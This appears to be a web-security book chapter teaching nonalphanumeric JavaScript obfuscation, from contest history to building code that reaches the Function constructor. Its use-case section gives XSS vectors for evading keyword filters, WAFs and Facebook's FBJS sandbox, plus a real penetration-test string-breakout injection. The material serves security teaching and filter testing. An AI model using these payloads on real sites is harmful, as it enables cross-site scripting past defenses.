Chapter 4. Nonalphanumeric JavaScript
Information in this chapter:
• Nonalphanumeric JavaScript
• Use Cases
Abstract:
It is believed that nonalphanumeric JavaScript has its roots in contests such as the Obfuscated C contest and Obfuscated Perl contest. These contests were designed to show how creative programmers could be in hiding normal source code using the general syntax of the Perl language. After providing a brief history of nonalphanumeric JavaScript, this chapter takes an in-depth look at how nonalphanumeric JavaScript code works. In JavaScript, objects usually return a string form of their contents when concatenated with another string. In addition, type coercion can produce number-based strings without specifically using numerical characters. The loosely typed nature of JavaScript also helps produce characters that strongly typed languages would find very difficult to produce. These topics are all discussed in this chapter to give you a solid background on the principles of how to create and execute nonalphanumeric JavaScript code. The chapter concludes with a number of interesting use cases.
Key words: Inflix operator, Hackvertor, International Obfuscated C Code Contest, String index, JavaScript arithmetic operator, JavaScript assignment operator, Small code, Not a Number object, Binary to ASCII function, ASCII to binary function
It is believed that contests such as the Obfuscated C and Obfuscated Perl were the origins of nonalphanumeric code. These contests were designed to show how creative programmers could be in hiding normal source code using the general syntax of the Perl language. The C contest started in 1984, and although my coauthors and I could not find specific examples of nonalphanumeric obfuscation, many of the techniques that were employed among the contestants are being used today. The goals of the International Obfuscated C Code Contest (IOCCC) are as follows1:
• To write the most Obscure/Obfuscated C program
• To show the importance of programming style, in an ironic way
• To stress C compilers with unusual code
• To illustrate some of the subtleties of the C language
• To provide a safe forum for poor C code :-)
If the IOCCC represents the birth of nonalphanumeric obfuscation, Perl represents the evolution. Perl makes it easy to produce nonalphanumeric code because of its default variables and its flexibility. The Obfuscated Perl contest ran from 1996 to 2000. Started by The Perl Journal, the contest took its name from the Obfuscated C contest (www.foo.be/docs/tpj/) and was heavily inspired by it. Loosely typed languages have an advantage over strongly typed languages such as C because they often allow variables to be undeclared. Perl is loosely defined and perfect for obfuscation because, like Perl creator Larry Wall says:
There's more than one way to do it3
Because of Perl's flexibility, nonalphanumeric code is a breeze in Perl. The following code4 produces the text “hello world”:
''=~('(?{'.('._@@/ˆ'ˆ'ˆ-).[~').'"'.('(:@@@ˆ_@_@@_'ˆ'@_,,/~(/-,$}').',$/})')
JavaScript nonalphanumeric code started in Japan, when a Ruby developer created some obfuscated Ruby code that prompted Yosuke Hasegawa to post a JavaScript version to the sla.ckers.org security forums (http://sla.ckers.org/forum/read.php?2,15812,page=14#msg-28465). This was truly groundbreaking for JavaScript, as nobody had ever seen code used in this way. This epic post spawned various new contests to create smaller and better versions of the code. During this time, the difficulty in producing certain characters such as the letter p became apparent due to the limitations of the text returned by native JavaScript objects. Therefore, to produce smaller code we had to discover new ways or hacks to generate these characters return to the window object. The contests can be viewed at the sla.ckers.org forums:
• “Diminutive NoAlphanumeric JS Contest,”http://sla.ckers.org/forum/read.php?24,28687
• “JavaScript Smallest NonAlnum Quine,”http://sla.ckers.org/forum/read.php?24,33201
• “Less chars needed to run arbitrary JS code,”http://sla.ckers.org/forum/read.php?24,32930
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$=({}+"")[_____]+({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; ($)[$][$]($"('"+$_"')")()
// Yousuke Hasegawas initial no-alnum code snippet
Nonalphanumeric JavaScript
Now that you know the history, you may still be wondering, how does nonalphanumeric JavaScript code work? In JavaScript, objects usually return a string form of their contents when concatenated with another string. In addition, type coercion can produce number-based strings without specifically using numerical characters. The loosely typed nature of JavaScript also helps produce characters that strongly typed languages would find very difficult to produce. We often refer to JavaScript as the language of hackers because of its surprising syntax and flexibility.
One of the most basic forms of nonalphanumeric code in JavaScript involves the use of inflix operators to acquire numbers. Numbers are the basic requirement for producing code, as string indexes require a position in the string.
String indexes refer to using numerical characters to obtain a single character in a string. For example, in the string “abc”, you can refer to the letter a by using a string index of zero (e.g. “abc”[0]).
Making a number from a string is pretty easy in JavaScript. You need a string or an object that converts to a string, and an operator that performs a numeric conversion. Tables 4.1 and 4.2 list the various JavaScript operators.
Table 4.1 JavaScript Arithmetic Operators6
OperatorDescriptionExampleResult
+Additionx = y + 2x = 7
Subtractionx = y−2x = 3
*Multiplicationx = y*2x = 10
/Divisionx = y/2x = 2.5
%Modulus (division remainder)x = y%2x = 1
+ +Incrementx = + + yx = 6
−−Decrementx = −−yx = 4
Table 4.2 JavaScript Assignment Operators7
OperatorExampleSame AsResult
=x = yx = 5
+ =x + = yx = x + yx = 15
− =x− = yx = xyx = 5
* =x* = yx = x*yx = 50
/ =x/ = yx = x/yx = 2
% =x% = yx = x%yx = 0
The operators we are most interested in for our purposes are +, −, /, *, ++, and −−. These provide us with a quick way to turn our object into a number. Table 4.3 lists what are believed to be the shortest possible ways to create zero without using zero.
Table 4.3 Shortest Possible Ways to Create Zero without Using Zero
CharactersResult
+ []0
+ '‘'0
+ '“'0
−[]0
−'‘'0
−"“"0
In Table 4.3, each piece of code is using an infix operator to convert our object into a number. In JavaScript, if you use a + or − a at the beginning of an object, you convert the object into a number regardless of what the object is. The value of the number usually depends on whether the result is true or false or whether the resultant string contains a number. To understand this better, consider the following examples:
alert(true+true)//2
alert(true+false)//1
alert(false+false)//0
Each code sample is a Boolean object and the + is used to add the objects together. JavaScript automatically handles the types and converts them into what it sees as the desired types for the operation. In this case, “true” is equal to 1 and “false” is equal to 0. Back to Table 4.3; because the result is zero each string/object is considered false in JavaScript and they are converted to zero. When JavaScript performs a numerical operation on a true or false value it automatically converts the value to zero for false and one for true.
Although other characters, such as and *, among others, can be used for numeric conversion, you are better off using + as it performs concatenation as well as acting as an infix operator. This allows you to use fewer characters for your nonalphanumeric code.
The next stage in the obfuscation process is to gain alpha characters without directly using them. In this case, we can use JavaScript's automatic toString() conversions of native objects, which works by returning a string based on the object used. If, for example, you define a JavaScript object using the object literal, the result when concatenated in most JavaScript engines will be [object Object]. You can see already that if we can obtain a number and an object, we can get the characters [, o, b, j, e, c, t, and so on without referencing those characters directly. To see how this works, observe the following code sample which returns the letter o by converting a literal object:
_={}+'';//[object Object]
alert(_[1])//o
We know how to obtain numbers and get strings from objects, but how do we actually execute the code of our choice? One trick is to return to window; once you have window, you have all the properties of window. This is not your only choice, however. If you can access a constructor you can access the Function constructor to execute arbitrary code. The problem is that constructor is a long word, and it requires a great deal of work to get the necessary characters. Fortunately, there are shortcuts we can employ to get our objects. My coauthors and I consider the shortest possible way to get window to be:
//Compatible at time of writing with Chrome, Firefox, Opera, Safari but NOT IE
alert((1,[].sort)())//window!
This is the shortest possible way to get window because sort is quicker to obtain than, for example, reverse. In the code, the sort function can accept an argument with a function. We do not supply the function, but we do store a reference to the actual sort function and not to the array. The comma is required; you could do the same thing using a normal assignment, but this way is shorter. We need to reference the sort function, so it leaks to window. When JavaScript loses a reference to the current object that a function was called on it reverts to the global object (window). The sort and reverse techniques start with a reference to a standard array literal. Then, instead of calling the object and then the method, we simply store a reference to the method in another variable. Thus, the window is returned when the method is called as the array literal has been lost.
Window objects shouldn't leak! They can break sandboxes and create obfuscation vectors. Thankfully, ECMA5 recognizes this and future versions of JavaScript will not leak window in this way.
Hopefully, you now understand the basics, so it is time to move things up a couple of gears. Our first task will be to produce a simple string, “alert”, without using any alphanumeric characters. When producing this code think about each step and concentrate on making the code smaller. Then, when you have completed each step, you can join them together. This will also enable you to borrow code from each snippet.
When creating each section of your nonalphanumeric code create duplicates separate from the main code, and place them in comments and add labels so that you know what output they produce.
Let us start with the letter a. At this point, it is useful to ask yourself which objects contain the letter a. The first that comes to mind is NaN (Not a Number). This can be returned in JavaScript when a numeric operation is performed on a value that isn't a legal number; JavaScript returns the result of the operation as NaN. The following code snippet shows how to get NaN without alphanumeric characters:
+[][+[]]//result: NaN
What happened here? This is a good question to ask yourself if you want to understand the code, looking at smaller fragments and working out what each operation does. Here the trick is to look at the second set of square brackets; +[] creates a zero inside an object accessor. So, from the right it looks like [+[]]; then, farther left a new array is created with [], so you are looking for a “0” inside a blank array which returns undefined because it does not exist. Finally, we use the infix operator, +, to convert undefined into a number, which JavaScript decides can not be a valid number, so it returns NaN.
The basis of nonalphanumeric techniques is to use the string output of native JavaScript objects. In the preceding case, we have the characters NaN because the JavaScript engine returns NaN after our code and allows us to convert it into a string using + ‘'.
Now we continue with a more complex example. We walk through the process of creating the string “alert” by using native JavaScript objects without using any of the letters in the string. To create the a we can use the NaN example in the preceding code sample. We will wrap that around some parentheses with a +[] to convert it to a string. Then we will access the middle part of “NaN” by specifying the second element; ++[[]][+[]] is the number 1, which is a quirk in JavaScript discovered by Oxotnick from the sla.ckers forums (see http://sla.ckers.org/forum/read.php?24,32930,32989#msg-32989). Normally, the increment/decrement operations can only be used on objects, but Oxotnick found a way around this by using an array with one element. This element can be any object that is equal to zero and then is converted to a number to create 1.
(+[][+[]]+[])[++[[]][+[]]]//a
Next we will create the letter l. The first object that comes to mind for creating l is a Boolean false; if we can convert the Boolean into a string we can access the l by using the previous technique to increment the number. A quick way to obtain a Boolean value is to use the ! (NOT) operator; this can convert any object that returns a positive number or zero into its opposite. In JavaScript, as we discussed in Table 4.3, strings or arrays can be used to convert a string into an integer based on the contents of the value. This is easily demonstrated by comparing a string to a number; as JavaScript is a loosely typed language, the string value is automatically converted.
''==0//true
As the preceding code sample demonstrates, the string is converted into zero automatically in JavaScript. This happens when an operator is used. When you use the NOT operator it will first be converted into a 0 or a 1 depending on the value; then it will be converted into a Boolean that is the opposite of the value.
We will look at the next code sample in two stages so that it is easier to understand. The first part will create the string “false” and the second part will create the number 2. We will combine them to create the letter l. Creating the “false” string is pretty straightforward. We use a blank array (which acts as a string) and then the NOT operator to obtain our Boolean. Then we wrap this in parentheses with another blank array which converts it into a string. Here is the first part of the code:
([![]]+[])//the string "false"
We almost have our l; now we need to access the third letter of “false.” JavaScript strings such as arrays are indexed from zero, so we need the number 2 to access the third element of the string. We can use the previous method of obtaining the number 1 and then place it within an array and increment it to produce 2.
++[++[[]][+[]]][+[]]//2
Combining the two samples together produces the letter l. We just have to use another [ and ] after the string and place our number inside. The code looks like this:
([![]]+[])[++[++[[]][+[]]][+[]]]//"l"
We have both a and l now, but how can we obtain e? If you have been following along, you'll know that one way to obtain e is to use a Boolean again. This time, however, we can use “true” as it's shorter and will produce a smaller amount of code.
It is always a good idea to use objects with a smaller string length where possible. This way, your obfuscated code will be easier to produce and will require fewer characters.
Again, the same technique is used to obtain 2. We simply wrap another array, and access the first element and increment again to access the number 3. We then use a second NOT operator to convert our array into “true” and then convert it into a string.
([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]//"e"
Obtaining r requires a similar technique to e. We can use “true” again, but this time we only need the second element of the string, which is the number 1.
([!![]]+[])[++[[]][+[]]]//"r"
The examples in this chapter were designed to be easy to follow, but they often do not represent the smallest optimized versions. For more up-to-date techniques and ways to produce characters with smaller amounts of code, consult the community cheat sheet on sla.ckers.org, at http://sla.ckers.org/forum/read.php?24,33349.
To create the character t, we can again use the Boolean “true”—but this time we'll use the first element of the string, so we only need a zero.
([!![]]+[])[+[]]//"t"
When assembling your obfuscation always store each character separately and concatenate them at the end. Not only is this easier to follow, but if you get a syntax error it is much easier to debug.
Our task is now complete. We can assemble our “alert” string by combining each of the code samples. Here is the final string:
alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])//"alert"
As you may have noticed, certain letters are harder to obtain than others. Depending on their position, in a native object others may not be obtainable at all using a limited range of characters.
Advanced nonalphanumeric JavaScript
Thus far, you have learned how to create a string using nonalphanumeric code. But how do you execute it? And how do you generate it in the first place? In this section, we will execute the string we generated previously and learn how to generate nonalphanumeric code.
The first task to execute some code is to obtain a native object such as window, which can enable you to call a function or evaluate a string. One way to obtain window in Firefox and other browsers is to use the array object to leak back to window using the sort method. Normally, when sort is executed on an array it has a reference to the array being used. If you can “lose” the reference, however, JavaScript will use the global object window instead. The following two examples show a normal sort operation and one in which the reference is lost and returns to window.
alert([3,2,1].sort());//1,2,3
alert((1,[].sort)())//[Object Window]
If you try the preceding examples in Firefox, you will see that the array is sorted correctly in the first line and the second line returns window. This works because the comma operator (,) returns the sort function, and as the sort function is executed directly, it has no way of knowing which array it references, so it returns window.
Now that we know a method for obtaining window, we need to generate “sort” with nonalphanumeric characters. If you remember from the preceding section, we already have r and t, so we will begin with s. False can again be used to obtain our letter. We need the fourth element of the string which is indexed as 3; we therefore need to generate the number 3 and use the string “false.” These code samples should start looking familiar to you now.
([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]//"s"
To obtain o we need to introduce some new characters. It is possible to generate o using the characters we have been using; however, the code would be very large, and in this chapter, we're trying to keep the examples easy to follow. As such, we can use { and } to generate o. A JavaScript object's default toString is [object Object], so we can get our letter o by using the second element of the string Object.
([]+{})[++[[]][+[]]]//"o"
Each JavaScript object has a toString method which is called when the object is converted to a string.
Using our previously generated characters, we can assemble our “sort” string quite easily, and we can generate the window object. I have commented the code and separated each section so that you can see how the window object is generated.
([],[][
([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]//"s"
+
([]+{})[++[[]][+[]]]//"o"
+
([!![]]+[])[++[[]][+[]]]//"r"
+
([!![]]+[])[+[]]//"t"
])()
Once we have the window object, we can then use our “alert” string to call the function by accessing the method and passing our string. I added a little shortcut to generate the number 1; I will leave it as an exercise for you to work out and understand how the final number is generated.
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](+!![])//calls alert(1)
All examples were tested on Firefox. Obfuscated code is possible on other browsers; however, Firefox was used because of its ability to generate window in a smaller amount of code.
At this point, we know how to call static methods of the window object, such as alert, but to evaluate code we need a method for converting a string and evaluating it. JavaScript offers a variety of ways to do this—we can use eval, Function, setTimeout, setInterval, and even the location object by passing a JavaScript string. Once we have a method for evaluating code, we can then generate characters using escapes. This allows us to generate any character, but we still have the problem of generating our strings which form our evaluation function, such as eval. Also, getting the character v is not an easy task with nonalphanumeric code. When competing in various slacker contests it became clear that the shortest possible method for obtaining an evaluation function was use of the constructor. Using the array constructor, you can execute code of your choice, as demonstrated in the following code snippet:
[].constructor.constructor("alert(1)")()//call Function and execute "alert(1)"
Accessing the constructor twice from an array object returns Function. If we can generate the characters c, o, n, and so on we can call the constructor and execute code using nonalphanumeric characters. To begin, we need the character c. We can reuse the previous code in this chapter where we generated “sort” as the function. It will return the following text: function sort() {[native code]}. We can get our c from the text of the sort function.
This time we will reuse our generated letters by assigning them to variables, as we discussed in the section “Unicode variables” in Chapter 3. You can generate nonalphanumeric variables by using the code in Chapter 3 to generate your own variables, but to make the examples easier here we will use the Hackvertor tag <@jsvariable_0(150, 200)/> to generate any valid variables in the range 150–200.
Developed by one of the authors of this book, Hackvertor is a free tool designed to help you generate nonalphanumeric variables. It is available at http://tinyurl.com/jsvariables.
Hackvertor can be used as a conversion utility, browser hacking platform, targeted fuzzing tool, cross-site scripting filter testing tool—the list goes on. It was developed because my coauthors and I wanted to incorporate our style of Web site testing, in which we use one platform to perform all the tests instead of using a variety of different scripts.
The system works with sets of categorized tags which magically perform conversions and character replacement. The idea is that you feed it content and tell it to replace parts of the content with data that is difficult to convert, without running several conversion routines or manually coding the JavaScript. Consider the following example: <@dec_ent_2(;)><@hex_ent_1(;)>test<@/hex_ent_1><@/dec_ent_2>. This example includes the required tags in Hackvertor to perform HTML decimal encoding on “test” followed by hexadecimal entity encoding. You place the required text in the input window, select it, and then click the required tags. Once that's complete, you simply click Convert to perform the operation.
a=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]],//"s"
µ=([]+{})[++[[]][+[]]],//"o"
o=([!![]]+[])[++[[]][+[]]],//"r"
À=([!![]]+[])[+[]],//"t"
Á=[][a+µ+o+À]//function sort(){ [native code]}
As you can see in the preceding example, we assign each letter to a variable so that we can reuse them later; then we combine them to produce the sort function, which we also assign to a variable. To get our letter c, we now need to use our newly created variable Á by converting the sort function into a string and accessing the fourth element of the string indexed as 3, because remember, JavaScript indexes from zero.
We can also reuse numbers that we generate, assign zero to a variable, and so on. Let us start by storing the numbers 0 through 3 so that we can access our character c.
Â=+[],//0
Ã=++[[]][+[]],//1
Ä=Ã+Ã,//2
Å=Ä+Ã//3
The advantage of using variables here becomes apparent as we no longer need to duplicate code and instead can just add each number together to get our next number. To generate c we just reuse the sort function we stored in variable Á, convert it to a string, and access the character by using our variable Å, which is the number 3.
The next letter is o, which we already have in our variable µ; then we have n, which we can obtain by reusing the sort function, as it contains the letter n at the third position of the string: function(){[native code]}. We already have s, t, and r; u can be generated again from the sort function. Next comes c, which we already generated, and finally, t, to complete the string “constructor”.
(Á+[])[Å]//"c"
µ,//already contains "o"
(Á+[])[Ä],//"n"
a,//already contains "s"
À,//already contains "t"
o,//already contains "r"
(Á+[])[Ã],//"u"
(Á+[])[Å],//"c"
À,//already contains "t"
µ,//already contains "o"
o,//already contains "r"
In the preceding example, each chunk of code is followed by a comment, beginning with //, that explains what letter the chunk of code generates. Who would have thought that nonalphanumeric code could possibly get access to the Function constructor…
As you have seen, the ability to execute code allows us to generate strings and access characters that were previously unobtainable. If you have trouble reproducing this code look at each line separately and make sure there is a terminating comma at the end of each line, except for the last line. If you managed to produce the code exactly, consider yourself a code obfuscation ninja.
You might have noticed that a few variables could reduce the code further, and there are in fact a couple of ways to squeeze more characters from each code chunk. Before you move on to the next section, try to reduce the code further and remove the comments as a personal challenge.
a=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]],//"s"
µ=([]+{})[++[[]][+[]]],//"o"
o=([!![]]+[])[++[[]][+[]]],//"r"
À=([!![]]+[])[+[]],//"t"
Á=[][a+µ+o+À]//function sort(){ [native code]}
Â=+[],//0
Ã=++[[]][+[]],//1
Ä=Ã+Ã,//2
Å=Ä+Ã,//3
//sort, "c", "o", "n","s","t","r","u","c","t","o","r"
Á[(Á+[])[Å]+µ+(Á+[])[Ä]+a+À+o+(Á+[])[Ã]+(Á+[])[Å]+À+µ+o]("alert(1)")()
Creating characters
Creating more characters, especially in cases where we are limited to the ones we can find on default toString methods, can be challenging. A few tables have been compiled from the proofs of concept (PoCs) that have been created5 (see http://sla.ckers.org/forum/read.php?24,32930,page=2 and http://sla.ckers.org/forum/read.php?24,33349). However, we still are missing some characters in most character sets. What can we do about this?
We also need to generate the string “return” because when we use the Function constructor, if “return” is not used it is considered a no-op instruction and will not pass our string. To be clear on how to do this without nonalphanumeric code check the following example:
alert(Function('return'+'\'\\'+'1'+'4'+'1\'')())//"a"
As you can see, this will allow us to generate any code we like. Let us create the code alert(“obfuscated”) using our technique. Our first task will be to create the string “return”; we already have most of the characters, so we will not duplicate the code at this point. Instead, we will just display the variables we have already collected.
Octal escape sequences use base 8 and the backslash character, followed by a number, to indicate that you wish to use an octal escape. The number represents the ASCII/Unicode number you want to display.
o+//"r"
(!![]+[])[Å]+//"e"
À+//"t"
(Á+[])[Ã]+//"u"
o+//"r"
(Á+[])[Ä]//"n"
We have assembled our string “return”; however, since there is no way for us to generate a backslash without actually using a literal backslash, we can skip that character for now. We now need to look at the string we want to encode. You can, of course, use shortcuts, and we recommend you do by reusing letters you have already created, but we will leave that as an exercise for you.
The string alert(“obfuscated”) looks like this when it is octal-encoded: \141\154\145\162\164\50\42\157\142\146\165\163\143\141\164\145\144\42\51. It is a good idea to store the backslash in a variable, as it is repeated quite often. We only need to enclose the escapes within a string; otherwise, a syntax error will be raised. We'll create a new set of variables to use using Hackvertor again; this time <@jsvariable_2(200, 250)/> is the tag we will use. Assigning the backslashes is the first step toward creating a new variable. Then we add the return string we created previously and enclose it within an escaped string literal before continuing to create all the escape sequences.
Here is the final code. As you can see, all the work we completed in previous sections comes together to produce an obfuscated string that even a trained eye would have a hard time decoding.
a=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]],//"s"
µ=([]+{})[++[[]][+[]]],//"o"
o=([!![]]+[])[++[[]][+[]]],//"r"
À=([!![]]+[])[+[]],//"t"
Á=[][a+µ+o+À]//function sort(){ [native code]}
Â=+[],//0
Ã=++[[]][+[]],//1
Ä=Ã+Ã,//2
Å=Ä+Ã,//3
È='\\',
É=Å+Ã,//4
Ê=É+Ã,//5
Ë=Ê+Ã,//6
Ì=Ë+Ã,//7
//sort, "c", "o", "n","s","t","r","u","c","t","o","r"
Á[(Á+[])[Å]+µ+(Á+[])[Ä]+a+À+o+(Á+[])[Ã]+(Á+[])[Å]+À+µ+o](Á[(Á+[])[Å]+µ+(Á+[])[Ä]+a+À+o+(Á+[])[Ã]+(Á+[])[Å]+À+µ+o](
//return
o+(!![]+[])[Å]+À+(Á+[])[Ã]+o+(Á+[])
[Ä]+
//'\141\154\145\162\164\50\42\157\142\146\165\163\143\141\164\145\144\42\51'
'\''+È+Ã+É+Ã+È+Ã+Ê+É+È+Ã+É+Ê+È+Ã+Ë+Ä+È+Ã+Ë+É+È+Ê+Â+È+É+Ä+È+Ã+Ê+Ì+È+Ã+É+Ä+
È+Ã+É+Ë+È+Ã+Ë+Ê+È+Ã+Ë+Å+È+Ã+É+Å+È+Ã+É+Ã+È+Ã+Ë+É+È+Ã+É+Ê+È+Ã+É+É+È+É+
Ä+È+Ê+Ã+'\'')())()//call Function twice
Another way to get alphanumeric characters using nonalphanumeric characters is with the binary to ASCII (btoa) function. This function is used on Firefox to encode into base64 binary data, and we can use it to generate ASCII characters with nonalphanumeric characters. To do this, we simply pass to the btoa function a binary blob—for example, btoa(“£¬”) returns the string “owas”. This proved to be the smallest algorithm for generating arbitrary letters, and was used in the OWASP AppSec diminutive nonalphanumeric JavaScript contest (see https://lists.owasp.org/pipermail/appsec_eu_2010/2009-September/000005.html) that challenged participants to find the smallest nonalphanumeric JavaScript code that executed alert(“owasp”). The winning entry was submitted by Mario Heiderich, one of this book's coauthors, and reads as follows:
ω=[[T.,Ŕ,,É,,Á,Ĺ,Ś,,,Ó,B.]=!''+[!{}]+{}][Ś+Ó+Ŕ+T.],ω()[Á+Ĺ+É+Ŕ+T.](Ó+ω()[B.+T.+Ó+Á]('Á«)'))
The code works by generating a binary string that represents the unencoded version of the string we want to generate. To do this, we can use the complement of btoa, called atob. This function (ASCII to binary) will decode a base64-encoded string into a binary string, and therefore allows us to generate what we need. The difference between this method and others is that here we create strings all at once, whereas, for example, the octal+Function method requires us to create the string byte by byte.
There are more ways to generate characters. One is to use the Number.prototype.toString method. Assuming we can get the string “toString” (which is easy with the previous trick, btoa(“¶,, ®)à”)) and create numbers, we can then create strings from the numbers by sending an argument to the toString method.
For example, 580049[‘toString’](30) will return “leet.” The way this works is very simple. The toString method of Numbers accepts an argument, which will transform the base of the number to the specified base. So, for example, 2..toString(2) will return “10,” and 10..toString(8) will return “12” which is the equivalent of 10 in octal base.
An interesting exception is when we start sending arguments larger than 10. For example, 87..toString(11) will return “7a,” because to convert to other bases you start with the alphabet (a to z) when the numeric chars are exhausted. Therefore, on base 36 we have all numbers from 0 to 9 and all letters from a to z.
To encode with this technique, we can use the native parseInt function, which receives a string as the first argument and the base in which that string is encoded as the second argument. Therefore, if we send:parseInt(“obfuscated”,36) it will return the number 2469713648668501, and if we cast this number back to base 36 it will return the string “obfuscated.”
A snippet of code that simplifies this was created by one of this book's coauthors, Eduardo Vela, and is available at http://sla.ckers.org/forum/read.php?2,15812,page=9#msg-22856.
Here is an example of the code in action:
>>> bs('this.string-has.been-obfu5c4t3d')
"(798868.9665787462).toString(30)+(-14615.396563741991).toString(29)+(-644372201965196).toString(31)"
>>> (798868.9665787462).toString(30)+(-14615.396563741991).toString(29)+(-644372201965196).toString(31)
"this.string-has.been-obfu5c4t3d"
The preceding code transforms a string into a piece of code which, when executed, will return the same string.
Use cases
Although the creation of nonalphanumeric code in JavaScript may appear to be nothing more than a game—a challenge meant to display the complexity and dynamics of the programming language—actual use cases do exist.
The most obvious is plain filter circumvention. Imagine a server- or client-side filter checking incoming data for certain keywords and strings which might indicate an attack, or at least the preparation of a hostile interaction. Filter mechanisms of this kind exist and are being used in the wild, although methods for detecting and circumventing them are obvious to versatile attackers. One technique is to eliminate any possible form of blacklist by simply not using any alphanumeric characters. The following example shows how a simple alert(1) would look in nonalphanumeric form. The sample was submitted by the user LeverOne on sla.ckers.org during an actual contest on nonalphanumeric JavaScript (see http://sla.ckers.org/forum/read.php?24,28687):
([,Á,È,a,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][a+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)
A defensive system actually checking user input for string patterns containing terms such as alert, unescape, or fromCharCode will epically fail when confronted with a vector such as this. However, it is not just Web application firewalls (WAFs) and intrusion detection systems that can be targeted and circumvented with nonalphanumeric code. JavaScript sandboxes also often experience serious trouble when dealing with these malicious snippets. One example is the Facebook FBML sandbox, which can be tested at http://developers.facebook.com/tools/.
FBML (Facebook Markup Language) is a proprietary markup dialect invented by the Facebook developers to enable users to submit active markup which can be extended with platform-specific extensions to enable easy creation of powerful Facebook applications. A subset of FBML is FBJS, a sandboxed approach to allow usage and processing of user-submitted JavaScript, enabling Facebook applications to have a nice look-and-feel and desktop application-like behavior. The FBJS sandbox assumes that functions are being called via their alphanumeric labels, such as alert(1) or window[‘alert’](1). This sandbox encapsulates all method calls into specific Facebook objects and methods to make sure no script can be executed without the surrounding namespace context and its limitations. This is primarily to make sure the user-submitted JavaScript cannot contain any exploits, redirections, access to sensitive user data such as document.cookie, or other information relevant in an attack scenario.
The result of a sandboxed and “secured” alert(1) would look like FB.app(‘0123456random.alert(1)’) or something similar, depending on the sandbox release version. However, nonalphanumeric characters nevertheless will not be touched by the securing algorithm. Because it would be extremely difficult to determine whether the character is a delimiter, an operator, or another language construct, an alert(1) built with nonalphanumeric characters will not be touched by the sandboxing algorithm, whereas the alphanumeric equivalent will. This indicates clearly, without disclosing any vulnerabilities in the Facebook sandbox approach, another real-life use case for code such as this.
Minimalistic sets
While performing a penetration test on a custom Web application in December 2009, a filter was encountered which only allowed user input that matched the regular expression ˆ[a-zA-Z]+[ˆa-zA-Z]+ (normal alphabetic characters followed by nonalphabetic characters). A second filter blocked any input containing the character - or ~.
One of the places in the application where user input was reflected was in a JavaScript string, and no other filtering was taking place. This meant a string such as foo”;alert(0)// would be blocked by the first filter. Fortunately, nonalphanumeric JavaScript could be used to get around this filter. This just left the second filter. Up to this point in time, most known nonalphanumeric JavaScript strings included uppercase ASCII characters and the characters and ~. Neither would be allowed for this particular injection. On the plus side, numeric characters were not forbidden, so this made it a bit easier to develop a bypass (though it would have been possible without using any number characters, of course). After a bit of work, a suitable injection was developed:
";_=[]+!![]+![]+[][1],_+=''+/./[_[0]+_[3]+_[7]+_[0]],(1,[][_[7]+_[24]+_[1]+_[0]])()[_[5]+_[6]+_[3]+_[1]+_[0]](0);"
Having successfully executed nonalphanumeric JavaScript without ~ and -, several new questions arose: What other characters can be left out and still execute arbitrary JavaScript? What is the smallest set of nonalphanumeric characters which will allow arbitrary JavaScript to be executed? What's the smallest set of characters (with no other restrictions) that will allow arbitrary JavaScript to be executed?
An obvious injection to consider for this last question is eval(name) which can execute arbitrary JavaScript. The string itself is 10 characters long, but the characters come from a set of just eight characters: a, e, l, n, m, v, (, and ). After a few hours of experimentation, it was discovered that eight characters for nonalphanumeric JavaScript would also work. The characters used were (, ), [, ], /, +, !, and , (a comma). So, this was at least as good as with full alphabetic characters! Could it be done with fewer than eight characters, though? A challenge was created at http://sla.ckers.org/forum/read.php?24,32930 to see if it could be reduced, in any browser. Sure enough, within a couple of days, the smallest character set was reduced to six characters. Shortly thereafter, other distinct sets of six characters were also found to work. Table 4.4 shows each of the known minimalistic sets.
Table 4.4 Minimalistic Sets of Nonalphanumeric JavaScript
CharactersSet Size
[ ] + ! ( )6
[ ] + = ()6
[ ] + = /_6
It is believed that six is the fewest number of characters possible which allow arbitrary JavaScript to be executed. However, there are several ways a minimalistic set of five can almost be constructed. The problem in trying to find a set smaller than six has thus become known as the Great JavaScript Charwall.
The reason it is called a wall is that the only way to traverse objects using nonalphanumeric characters is to use []. And then, the only way my coauthors and I know to concatenate strings and create numbers is with +. This leaves us with []+ as an absolute minimal set.
To actually execute code, we have two options:
1. Use an assignment (via node.innerHTML or location).
2. Use a function call (eval, Function, location.replace).
However, to get a reference to a node, or location, or Function, we need a reference to the global object (window), and we failed to find a way to get a reference to window with just []+=, so other chars were needed.
Option 1 requires us to use the equals sign (=), so we end up with []+=; option 2 requires us to use (), so we end up with []+() and get a reference to Function using [].filter.constructor(‘code’)(), where [].filter is a function and filter.constructor is Function. But to actually get the chars needed to write “filter,” we are required to get “true” or “false,” and so we need either the bang sign (!) or a =, resulting in a total of six chars.
Another possibility is to use []+/_ and get the reference to window using [][‘__parent__’]. This has proven to be the character set that can create the smallest arbitrary codes. We construct the _ by using /_/ as a regular expression and then concatenating it with an empty array to cast it to a string. Then we get the character in position 1, [/_/+[]][+[]][++[[]][+[]]], and then get location from there and assign it to a controlled value.
